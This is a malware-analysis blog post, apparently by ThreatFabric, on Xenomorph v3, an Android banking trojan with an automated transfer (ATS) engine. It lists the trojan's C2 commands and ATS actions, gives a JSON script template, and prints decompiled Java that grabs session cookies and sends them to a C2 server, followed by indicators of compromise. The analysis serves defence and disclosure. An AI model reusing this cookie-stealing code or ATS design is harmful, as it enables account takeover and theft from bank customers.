Xenomorph v3: a new variant with ATS targeting more than 400 institutions

Research

Xenomorph v3: a new variant with ATS targeting more than 400 institutions

10 March 2023

Xenomorph Introduces ATS and hundreds of new Targets

In the last year ThreatFabric saw a radical shift in the approach towards mobile malware from criminals. Criminals have started paying closer attention to the world of Mobile banking, abandoning more rudimental approaches in favor of a more refined and professional philosophy.

The most evident example of this new wave of malware creators is offered by the Hadoken Security Group. We have mentioned this actor previously in our blog about BugDrop: the products developed and distributed by this group have been circulating for the entirety of 2022, while the actors themselves surfaced by claiming the ownership of the malware in May.

hadoken

The main product of this group is Xenomorph, a Android banking trojan discovered by ThreatFabric in February 2022. This malware family has been a work in progress for the entirety of 2022, and despite being distributed in small campaigns, it never truly reached the volume of other malware families on the threat landscape, such as Octo or more recently Hook.

Xenomorph campaigns have always been characterized by short and contained distribution efforts, first via GymDrop, a dropper operation created and managed by the same group, and later via Zombinder, another distribution vector that we covered on a previous article in December 2022. In either case, the short bursts of activity were indicative of short test runs opposed to a real large scale distribution with fraudulent intent.

However, things are very likely to change in the near future: ThreatFabric’s analysts have discovered a new variant of this malware family, which we classify as Xenomorph.C.

This new version of the malware adds many new capabilities to an already feature rich Android Banker, most notably the introduction of a very extensive runtime engine powered by Accessibility services, which is used by actors to implement a complete ATS framework. With these new features, Xenomorph is now able to completely automate the whole fraud chain, from infection to funds exfiltration, making it one of the most advanced and dangerous Android Malware trojans in circulation.

In addition, the samples identified by ThreatFabric featured configurations with Target lists made of more than 400 banking and financial institutions, including several cryptocurrency wallets, with an increase of more than 6 times with comparison to its previous variants, including financial institutions from all continents.

In addition, after discovering some samples belonging to this new variant, our researchers also discovered the website dedicated to the advertisement of this Android banker, indicating clear intentions of entering the MaaS landscape, and start large scale distribution.

This functionality is typical of more advanced malware families, such as Gustuff and SharkBot, which have caused thousands of euros worth of damage towards their targeted institutions.

In this article we will cover the main new features of this variant, and how these new variations can elevate Xenomorph’s threat level.

Distribution

Test Samples

ThreatFabric was able to identify also some samples connected to test campaigns: in these cases, the samples seem to be linked with distribution abusing third party hosting services, more specifically Discord Content Delivery Network (CDN). This is not the first time we see malware using this sort of legitimate hosting services: it not uncommon to see malware authors use services such as Discord CDN or GitHub repositories to hide in plain sight their products.

cdn

The reasons for using this sort of service are quite straight forward: these are very common services, which are very reliable and used by millions of people. In addition, it is free to open an account and use it to distribute malware and there are no limitation on the number of accounts. Finally, it is very common for devices to connect to such services, so it is less likely that a security service might flag connections to these domains as suspicious.

In this specific case it is likely that these samples, which are not really part of any campaign, were simply hosted on Discord CDN for sharing purposes, and not for distribution.

Zombinder Campaign

The first variants of Xenomorph were distributed by GymDrop, in February 2022. Later in the year we saw the Hadoken group switch distribution medium, trying out first BugDrop, and finally landing on Zombinder. In our case, Xenomorph v3 is deployed by a Zombinder app “bound” to a legitimate currency converter, which downloads as an “update” an application posing as Google Protect:

This seems to be the method of choice with the third version of Xenomorph, abandoning previous in-house developed techniques. Despite this, actors behind Zombinder have claimed to have stopped providing the service, indicating that there might be once again a switch in distribution in future builds of Xenomorph.

Targets

Xenomorph, since its first appearance, has revolved around gathering PII such as usernames and passwords using overlay attacks.

Over the course of 2022, Xenomorph has maintained a relatively stable set of targets in its configuration, with specific interest in Spain, Portugal, and Italy, with the latest campaigns also introducing Belgian and Canadian institutions, together with some cryptocurrency wallets.

The first sample of this new variant analyzed by ThreatFabric continued this trend, featuring the same list of targets as the previous versions observed. However, another sample, seemingly belonging to the same campaign, but sporting the tag “xeno3-test”, contained a much larger list of targets, counting more than 400 institutions, more than 6 times the number of targets available in the first sample.

In the case of Android Banking malware served as MaaS, it is relatively common that different campaigns of the same malware variant will have different targets, based on the requirements of the actors managing it. In many cases, actors who develop malware outsource the job of maintaining overlays up-to-date with the latest designs of all the different banking application that they target. There are several actors who sell this sort of service in hacking forums.

targets-02

Considering the “xeno3-test” tag, it is likely that the application belongs to a test build, which might feature the actual list of possible targets from which renters can choose from. Both lists will be available in the Appendix section of this article.

Capabilities

The first variant of Xenomorph discovered in February 2022 lacked a large amount of features, such as accessibility logging and remote actions to abuse Accessibility Services to perform fraud. It is clear that ThreatFabric detected these first samples while the malware was still undergoing a clear development phase.

After a few months of inactivity since its initial discovery, a new variant of the malware was discovered by ThreatFabric researchers in June 2022. It included a complete overhaul of the code base, increasing the modularity of the source code in order to make the malware more flexible and easier to update. This was very likely a initial test phase of Xenomorph, which introduced the support for remote actions thanks to the introduction of a Accessibility Services powered runtime engine, which could be used to simulate actions to impersonate the victim.

With Xenomorph.C, criminals also added the support for a complete ATS framework using this engine, which is referred to as RUM engine by the actors.

Here is the list of all commands supported by Xenomorph V3, with the newly added ones in bold:

Command	Description
app_list	Send List of installed apps
inj_enable	Enable injections
inj_disable	Disable Injections
inj_list	Not Implemented
inj_update	Request update of injections
fg_enable	Enable notification in Foreground
fg_disable	Disable notification in Foreground
notif_ic_enable	Enable Notification Intercept
notif_ic_disable	Disable Notification Intercept
notif_ic_list	Not Implemented
notif_ic_update	Not Implemented
sms_log	Log SMSs
sms_ic_enable	Enable SMS Intercept
sms_ic_disable	Disable SMS Intercept
socks_start	Start Socks server
socks_stop	Stop Socks server
sms_ic_list	Not Implemented
sms_ic_update	Not Implemented
app_kill	Kill Specified Application Process
app_delete	Not Implemented
app_clear_cache	Not Implemented
self_kill	Not Implemented
self_cleanup	Removes the malware itself
app_start	Start Specified Application
show_push	Show Push notification
cookies_handler	Obtain Cookies
send_sms	Send SMS
make_ussd	Run USSD Code
call_forward	Forward Call
execute_rum	Run ATS Module

ATS Framework

As we covered in previous articles, the term ATS (Automated Transfer Systems) is used to define a set of features that allow criminals to automatically complete fraudulent transactions on infected devices. Such systems are able to automatically extract credentials, account balance, initiate transactions, obtain MFA tokens and finalize the fund transfers, without the need of human interaction from an operator.

Scripts are received in JSON format, are processed, and converted into a list of operations to be executed by the engine on the device. Here is an example of the structure of such scripts:

{
    "module": "<MODULE_NAME>",
    "version": 1,
    "parameters": [...], // LIST OF PARAMETERS
    "requires": [...], // LIST OF REQUIRED CONDITIONS
    "triggerConditions": [...], // LIST OF TRIGGER CONDITIONS
    "terminator": {
        ...
    }, // IS TERMINATOR ENABLED
    "operations": [...] // LIST OF OPERATIONS TO BE EXECUTED (ATS)
}

With the help of such systems, the malware present on an infected device can easily extract the required PIIs and use them to perform all sorts of criminal activity.

The engine used by Xenomorph stands out from its competition thanks to the extensive selection of possible actions that are programmable and can be included in ATS scripts, in addition to a system that allows for conditional execution and action prioritization. To illustrate the capabilities of this engine, we will take as an example a script extracted from Xenomorph’s config and used to extract MFA codes from Google’s authenticator application.

Banks are slowly abandoning the use of SMS to perform Multi-Factor Authentication (MFA). As an alternative, many institutions seem to have opted for the use of Authenticators applications. However, such applications are often used on the same device used to complete the transaction. A modern banking malware installed on an infected device is able to initiate a fraudulent transaction abusing the targeted banking application, and at the same time use the authenticator app to read the required authentication codes.

In the case of Xenomorph, criminals created a ATS module for exactly this purpose: the code collection module is triggered whenever the authenticator app is launched by the malware, using quite flexible conditional trigger conditions, as shown in the image below:

ats-condition

The engine provides quite a large set of customizable options, including for example logical operators. This allows criminals to create complex conditions to take care of all possible scenarios, increasing the effectiveness of each infection.

If these conditions are satisfied, the malware will proceed and extract codes which follow a specific structure, which in the case of authenticator codes consists in two groups made out of three digits, as shown in the following image:

This is just an example of ATS script. Here is the full list of available actions and their corresponding description:

Action Code	Description
clickOnNode	Clicks on specified node
getRootNode	Get pointer to Root node
getParent	Get Parent of Specified node
getFirstNeighborsRespectively	Get nearest node
findAllowButton	Finds button to allow action
getText	Gets text of specified node
clickOnParent	Clicks on parent node
clickOnFirstClickable	Clicks on nearest clickable object
clickAllowButton	Clicks on allow button
clickCancelButton	Clicks on cancel button
CONTROL_MODULE_FINISH_SUCCESSFULLY	Communicate with control module a successful execution
CONTROL_MODULE_ABORT	Communicate with control module a failed execution
CONTROL_GO_HOME	Press HOME button
CONTROL_GO_BACK	Press BACK button twice
CONTROL_GO_BACK5	Press BACK button 5 times
CONTROL_MODULE_RETURN	Communicate with control module a finished execution
DEBUG_LOG_CONTEXT	Log current context
DEBUG_LOG_WHOLE_CONTEXT	Log entire context
DEBUG_LOG_MODULE_REGISTERED_ACTIONS	Log RUM registered actions
DEBUG_LOG_CURRENT_DATA	Log data contained in current context
DEBUG_PRINT	Debug print function
setActionPassedThrough	Sets an existing action to be ignored by the engine
findNodesByParameters	Finds nodes on UI based on search parameters
findFirstNodeByParameters	Finds first node matching on UI based on search parameters
findNodesByClass	Finds node based on class name
findFirstNodeByClass	Finds first node based on class name
findNodesByViewId	Finds node based on ViewId
findFirstNodeByViewId	Finds first node based on ViewId
findFirstNodeByText	Finds node based on text
getNodeByIndex	Finds first node based on text
getFirstChildOfClass	Finds node which is a child of specified class
CONTROL_PUT_ACTION_RESULT	Store a bool indicating if the action was successful
sleepForMilliseconds	Sleep for specified number of milliseconds
CONTROL_SET_UNPROCESSED	Sets if there was an unprocessed event
CONTROL_CLEAR_UNPROCESSED	Clears unprocessed events
CONTROL_FLUSH_ALL_CONTEXT_DATA_ENTRIES	Clear all node entries
STATE_EVENT_CLEAR	Clear state events
CONTROL_RUN_MODULE_STRAIGHT	Run ATS module
CONTROL_GLOBAL_VALUE_SET_FROM_TEXT_DATA_ENTRY	Set Value in Shared Preferences from data entry
CONTROL_GLOBAL_VALUE_SET	Set Value in Shared Preferences
DATA_JOIN_TUPLE_LIST	Join lists of variables into tuple list
API_SEND_SIMPLE_STATE_WITH_OBJECT	Send data to C2

With this array of features and capabilities, it is quite easy to create a script to extract information such as account balance, and then perform all the necessary steps to complete a fraudulent transaction.

Xenomorph’s latest version also added Cookie stealer capabilities to its already very extensive arsenal of weapons. After being introduced in the world of Android bankers by S.O.V.A. in September 2021, this feature was also added to the list of features of other families such as SharkBot, and now Xenomorph.

Session Cookies allow users to maintain open sessions on their browsers without having to re-input their credentials repeatedly. A malicious actor in possession on a valid session cookie has effectively access to the victim’s logged in web session.

Xenomorph, just like the other malware families previously mentioned, starts a browser with JavaScript interface enabled. The malware uses this browser to display the targeted page to the victim, with the intent of tricking users into logging into the service whose cookie Xenomorph is trying to extract.

cookies

Upon successful login, the browser will extract the cookie using the Android CookieManager and will send it to the C2 server, giving an additional way to perform account takeover (ATO) to criminals. Here is a snippet of the code used to grab the cookie from the malware controlled browser:

WebView webView0 = new WebView(this);
this.wv = webView0;
webView0.getSettings().setJavaScriptEnabled(true);
this.wv.setWebViewClient(new WebViewClient() {
    @Override android.webkit.WebClientView

    public void onPageFinished(WebView webView0, String s) {
        String s1 = CookieManager.getInstance().getCookie(s);
        String[] arr_s = CookieManager.getInstance().getCookie(s).replace(";", "").split(" ");
        if (s1.contains("sessionid")) {
            try {
                JSONObject jSONObject0 = new JSONObject();
                for (int v = 0; v < arr_s.length; ++v) {
                    String[] arr_s1 = arr_s[v].split("=");
                    jSONObject0.put(arr_s1[0], arr_s1[1]);
                    new StringBuilder().append("cookie is = ").append(jSONObject0).toString();
                }
    UtilGlobal.sendCookies(jSONObject0.toString());
            } catch (Exception exception0) {
                UtilGlobal.sendCookies("cookiesGrabbingFailed");
                new StringBuilder().append("Cookie Grabber Error: ").append(exception0.getMessage()).toString();
            }
            return;
        }
    }
});
this.wv.addJavascriptInterface(new WebAppInterface(this), "Android");
this.wv.loadUrl("$rstr[CURD]");
this.setContentView(this.wv);

Conclusions

The Xenomorph saga highlights once more that actors are switching their focus on mobile malware. The efforts of Hadoken Security Group showcase how criminals are adopting more structured development cycles and programming philosophies to create increasingly more dangerous malware families. The latest version of Xenomorph included large improvements from its previous iteration, adding Automated Transfer System (ATS) capabilities, which elevate the threat level of this family even more.

Xenomorph v3 is capable of performing the whole fraud chain, from infection, with the aid of Zombinder, to the automated transfer using ATS, passing by PII exfiltration using Keylogging and Overlay attacks. In addition, the Threat Actor behind this malware family has started actively publicizing their product, indicating a clear intention to expand the reach of this malware. ThreatFabric expects Xenomorph to increase in volume, with the likelihood of being one again distributed via droppers on the Google Play Store.

Financial organizations are welcome to contact us: if you suspect some app be involved in malicious activity, feel free to reach our Mobile Threat Intelligence team which will provide additional details and help with reporting the malicious app if identified: mti@threatfabric.com.

Fraud Risk Suite

ThreatFabric’s Fraud Risk Suite enables safe & frictionless online customer journeys by integrating industry-leading mobile threat intel, behavioral analytics, advanced device fingerprinting and over 10.000 adaptive fraud indicators. This will give you and your customers peace of mind in an age of ever-changing fraud.

Appendix

Zombinder sample

App name	Package name	SHA-256
CoinCalc	com.samruston.flip	15e3c87290957590dbaf4522645e92933b8f0187007468045a5bd102c47ea0f4

Xenomorph V3 Samples

App name	Package name	SHA-256
Play Protect	com.great.calm	9ce2ad40f3998860ca1ab21d97ea7346bf9d26ff867fc69c4d005c477c67a899
Play Protect	meritoriousness.mollah.presser	88d3cb485f405a6cec9d14e9ee2865491855897bfc9a958c0e7c06485a074d02

Xenomorph V3 Servers

C2 Server	Campaign
team[.]mi1kyway.tech	test samples
vldeolan[.]com	live campaigns
cofi[.]hk	live campaigns
dedeperesere[.]xyz	live campaigns

Injection Server	Campaign
inj.had0[.]live	test samples
jobviewer[.]co	live campaigns